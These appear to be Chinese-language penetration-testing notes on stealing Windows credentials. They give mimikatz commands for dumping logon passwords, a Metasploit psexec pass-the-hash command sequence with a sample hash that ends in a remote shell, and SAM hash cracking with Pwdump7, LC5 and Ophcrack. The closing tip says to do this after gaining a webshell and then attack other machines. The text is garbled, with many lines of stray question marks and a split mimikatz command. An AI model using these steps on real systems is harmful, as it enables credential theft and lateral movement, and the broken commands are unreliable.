1.、直接通过mimikatz读取管理员密码? :可以在cs里面找到这个工具,但是它只能读操作系统的密码。lazagne工具可以读所有密码(浏览器、操作系统、邮件系统的密码)。
找到.exe文件,然后放到c盘目录下:?
?
?
?
?
?
?
?
第一条:privilege::debug ? //提升权限 ?
第二条:sekurlsa::logonpa ssWords ?//抓取密码
2.本地hash远程攻击:只能在低版本的kali机上才能成功。在解密不了的情况下使用这种方法。hash值是可以直接进行登陆的,也就是说没有明文密码也可以进行登陆。
hash值的获取:1.在msf里面可以获取到。2.通过专业工具获取:以下是专业工具。需要将工具复制到虚拟机里面。
?利用Hash远程登录系统 ? ?主要通过MSF提供的exploit/windows/smb/psexec 模块来完成。
msf >use exploit/windows/smb/psexec msf >set RHOST 192.168.1.109 msf >set SMBUser administrator msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 msf >exploit msf >shell
本地hash暴力破解:
1.通过LC5暴力破解Hash密码 ? ? 使用gmer直接提权SAM和system文件或用Pwdump7提取hash,最后使用LC5破解。
2、使用Ophcrack破解系统Hash密码 http://simeon.blog.51cto.com/18680/122160
需要将需要暴力破解的sam 、system.config两个文件复制到kali机内,对sam进行暴力破解,用到的工具是Ophcrack
注意:
1.在我们获得webshell后首先通过这些工具获取到操作系统密码。通过获得的密码攻击其他机器。